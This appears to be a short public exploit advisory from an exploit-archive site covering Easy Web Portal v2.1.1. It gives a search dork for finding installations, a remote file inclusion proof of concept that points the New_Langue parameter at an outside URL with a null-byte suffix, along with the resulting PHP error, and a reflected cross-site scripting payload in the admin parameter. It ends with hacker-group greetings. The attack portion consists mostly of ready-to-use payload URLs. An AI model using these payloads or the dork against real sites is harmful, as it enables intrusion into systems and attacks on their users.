facebook facebook twitter rss

Easy Web Portal v2.1.1 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
| # Title    : Easy Web Portal v2.1.1 Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : EWP a été construit avec Easy Web Portal v2.1.1
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Multi
| # Download : http://www.p30vel.ir
=======================================

File inclusion :

URL encoded GET input New_Langue was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
<b>Warning</b>: include() [<a href='function.include'>function.include</a>]: Failed opening './include/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php' for inclusion (include_path='.;C:\php5\pear') in <b>C:\AppServ\www\tst\index.php</b> on line <b>112</b>

/tst/index.php?admin=0&affiche=&New_Langue=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3f%2500.jpg

Cross site scripting (verified) :

This vulnerability affects /tst/index.php
URL encoded GET input admin was set to 0' onmouseover=prompt(976752) bad='
The input is reflected inside a tag parameter between single quotes.


Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

Like us on Facebook :